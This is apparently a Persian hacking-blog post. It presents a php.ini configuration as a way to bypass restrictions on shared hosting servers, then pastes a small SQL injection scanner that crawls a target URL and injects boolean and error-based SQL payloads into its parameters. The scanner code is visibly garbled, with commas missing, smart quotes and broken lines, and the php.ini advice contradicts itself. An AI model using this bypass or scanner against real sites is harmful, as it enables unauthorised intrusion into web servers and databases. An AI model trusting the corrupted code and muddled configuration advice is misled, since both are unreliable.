loading...
Hacker\'s City
امیر بازدید : 125 دوشنبه 27 بهمن 1393 نظرات (0)

تقریبا میشه خیلی سرور ها رو باهاش بایپس کرد فقط کمی تغیرات لازمه!!!
با یه مثال:
اگه فایل php.ini بصورت زیر باشه

کد HTML:
safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = O

فقط کافیه موارد زیر رو جلوی disable_functions قرار بدید:

کد HTML:
"ln, cat, popen, pclose, posix_getpwuid, posix_getgrgid, posix_kill, parse_perms, system, dl, passthru, exec, shell_exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, pcntl_exec, ini_alter, pfsockopen, leak, apache_child_terminate, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, fpassthru, stream_select, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual, chmod, file_upload, delete, deleted, edit, fwrite, cmd, rename, unlink, mkdir, mv, touch, cp, cd, pico"

یعنی php.ini رو بصورت زیر تغییر بدیم:

کد HTML:
safe_mode = Off
disable_functions = "ln, cat, popen, pclose, posix_getpwuid, posix_getgrgid, posix_kill, parse_perms, system, dl, passthru, exec, shell_exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, pcntl_exec, ini_alter, pfsockopen, leak, apache_child_terminate, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, fpassthru, stream_select, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual, chmod, file_upload, delete, deleted, edit, fwrite, cmd, rename, unlink, mkdir, mv, touch, cp, cd, pico"
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On

قبلا رو Ovh & Bluehost servers ها جواب می داد

 

کد PHP:
#!/usr/bin/env python 
import difflibhttpliboptparserandomresysurllib2urlparse 
NAME 
“Damn Small SQLi Scanner (DSSS) < 100 LOC (Lines of Code)” 
VERSION 
“0.1b” 
AUTHOR 
“Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)” 
LICENSE “GPLv2 (www.gnu.org/licenses/gpl-2.0.html)” 
NOTE 
“This is a fully working PoC proving that commercial (SQLi)  scanners can be beaten under 100 lines of code (6 hours of work,  booleanerrorlevel 1 crawl)” INVALID_SQL_CHAR_POOL = ['(',')','\'','"'
CRAWL_EXCLUDE_EXTENSIONS =  (“gif”,”jpg”,”jar”,”tif”,”bmp”,”war”,”ear”,”mpg”,”wmv”,”mpeg”,”scm”,”iso”,”dmp”,”dll”,”cab”,”so”,”avi”,”bin”,”exe”,”iso”,”tar”,”png”,”pdf”,”ps”,”mp3″,”zip”,”rar”,”gz”
SUFFIXES = ["""-- ""#"
PREFIXES = [" "") ""' ""') "
BOOLEANS = ["AND %d=%d""OR NOT (%d=%d)"
 
DBMS_ERRORS = {} 
DBMS_ERRORS["MySQL"] = [r"SQL syntax.*MySQL"r"Warning.*mysql_.*"r"valid MySQL result"r"MySqlClient\."
DBMS_ERRORS["PostgreSQL"] = [r"PostgreSQL.*ERROr"r"Warning.*\Wpg_.*"r"valid PostgreSQL result"r"Npgsql\."
DBMS_ERRORS["Microsoft SQL Server"] = [r"Driver.* SQL[\-\_\ ]*Server”,  r”OLE DB.* SQL Server”, r”(\W|\A)SQL Server.*Driver”,  r”Warning.*mssql_.*”, r”(\W|\A)SQL Server.*[0-9a-fA-F]{8}”, r”Exception  Details:.*\WSystem\.Data\.SqlClient\.”, r”Exception  Details:.*\WRoadhouse\.Cms\.”] 
DBMS_ERRORS["
Microsoft Access"] = [r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"] 
DBMS_ERRORS["
Oracle"] = [r"ORA-[0-9][0-9][0-9][0-9]r”Oracle error”,  r”Oracle.*Driver”r”Warning.*\Woci_.*r”Warning.*\Wora_.*
DBMS_ERRORS["IBM DB2"] = [r"CLI Driver.*DB2"r"DB2 SQL error",  r"db2_connect\("r"db2_exec\("r"db2_execute\("r"db2_fetch_"
DBMS_ERRORS["Informix"] = [r"Exception.*Informix"
DBMS_ERRORS["Firebird"] = [r"Dynamic SQL Error"r"Warning.*ibase_.*"
DBMS_ERRORS["SQLite"] = [r"SQLite/JDBCDriver"r"SQLite.Exception",  r"System.Data.SQLite.SQLiteException"r"Warning.*sqlite_.*",  r"Warning.*SQLite3::"
DBMS_ERRORS["SAP MaxDB"] = [r"SQL error.*POS([0-9]+).*”, r”Warning.*maxdb.*”] 
DBMS_ERRORS["
Sybase"] = [r"Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"] 
DBMS_ERRORS["
Ingres"] = [r"Warning.*ingres_", r"Ingres SQLSTATE", r"Ingres\W.*Driver"] 
 def getTextOnly(page): 
retVal = re.sub(r”(?s)|||<[^>]+>|\s”, ” “, page) 
retVal = re.sub(r”\s{2,}”, ” “, retVal) 
return retVal 
 def retrieveContent(url): 
retVal = ["", httplib.OK, "", ""] # [filtered/textual page content, HTTP code, page title, full page content] 
try: 
retVal[3] = urllib2.urlopen(url.replace(” “, “%20″)).read() 
except Exception, e: 
if hasattr(e, ‘read’): 
retVal[3] = e.read() 
elif hasattr(e, ‘msg’): 
retVal[3] = e.msg 
retVal[1] = e.code if hasattr(e, ‘code’) else None 
match = re.search(r”"
retVal[3]) 
retVal[2] = match.group(“title”) if match else “” 
retVal
[0] = getTextOnly(retVal[3]) 
return 
retVal 
 def shallowCrawl
(url): 
retVal set([url]) 
page retrieveContent(url)[3
for 
match in re.finditer(r”href\s*=\s*\(?P[^\"]+)\”"pagere.I): 
link urlparse.urljoin(urlmatch.group(“href”)) 
if 
link.split(.)[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS
if 
reduce(lambda xy== ymap(lambda xurlparse.urlparse(x).netloc.split(:)[0], [urllink])): 
retVal.add(link
return 
retVal 
 def scanPage
(url): 
for 
link in shallowCrawl(url): 
print 
scanning: %s” link 
for match in re.finditer(r”(?:[?&;])((?P\w+)=[^&;]+)link): 
vulnerable False 
tampered 
link.replace(match.group(0), match.group(0) +  “”.join(random.sample(INVALID_SQL_CHAR_POOL,  len(INVALID_SQL_CHAR_POOL)))) 
content retrieveContent(tampered
for 
dbms in DBMS_ERRORS
for 
regex in DBMS_ERRORS[dbms]: 
if 
not vulnerable and re.search(regexcontent[0], re.I): 
print 
” (oparameter ‘%s’ could be SQLi vulnerable! (%s error message)” % (match.group(‘parameter’), dbms
vulnerable True 
if not vulnerable
original retrieveContent(link
arandom.randint(100255), random.randint(100255
for 
prefix in PREFIXES
for 
boolean in BOOLEANS
for 
suffix in SUFFIXES
if 
not vulnerable
template %s%s%s” % (prefixbooleansuffix
payloads = (link.replace(match.group(0), match.group(0) + (template %  (aa))), link.replace(match.group(0), match.group(0) + (template % (a,  b)))) 
contents = [retrieveContent(payloads[0]), retrieveContent(payloads[1])] 
if 
any(map(lambda xoriginal[x] == contents[0][x] != contents[1][x],  [12])) or len(original) == len(contents[0][0]) != len(contents[1][0]): 
vulnerable True 
else: 
ratios map(lambda xdifflib.SequenceMatcher(Noneoriginal[0], x).quick_ratio(), [contents[0][0], contents[1][0]]) 
vulnerable ratios[0] > 0.95 and ratios[1] < 0.95 
if vulnerable
print 
” (iparameter ‘%s’ appears to be SQLi vulnerable! (\%s\)” % (match.group(‘parameter’), payloads[0]) 
 if 
__name__ == “__main__”
print 
%#v%s\n by: %s\n” % (NAME, VERSION, AUTHOR) 
parser optparse.OptionParser(version=VERSION
parser.add_option(-u”“–url”dest=”url”help=”Target URL (e.g. \”http://www.target.com/page.htm?id=1\”)”) 
optionsparser.parse_args() 
if 
options.url
scanPage(options.url
else: 
parser.print_help()  
ارسال نظر برای این مطلب

کد امنیتی رفرش
درباره ما
Profile Pic
در این وبلاگ سعی بر این می باشد که سطح آگاهی افراد در فضای مجازی بالا رفته و کم تر هدف حملات از جانب هکر ها قرار بگیرند و همچنین با مباحث امنیت بطور تخصصی تر بخورد کنند . لازم به ذکر هست تیم "شهر هکر ها " متشکل از 3 نفر از با تجربه ترین افراد در این زمینه می باشد و زیر نظر پلیس فتا فعالیت میکند - تمامی مطالب این وب مطابق قوانین جمهوری اسلامی ایران می باشد "
اطلاعات کاربری
  • فراموشی رمز عبور؟
  • نویسندگان
    آرشیو
    نظرسنجی
    آیا با عضویت ویژه و ارسال مطالب کم یاب موافقید ؟
    آمار سایت
  • کل مطالب : 5
  • کل نظرات : 5
  • افراد آنلاین : 2
  • تعداد اعضا : 13
  • آی پی امروز : 1
  • آی پی دیروز : 22
  • بازدید امروز : 3
  • باردید دیروز : 24
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 27
  • بازدید ماه : 32
  • بازدید سال : 262
  • بازدید کلی : 55,358
  • کدهای اختصاصی
    قفس دانلود فیلم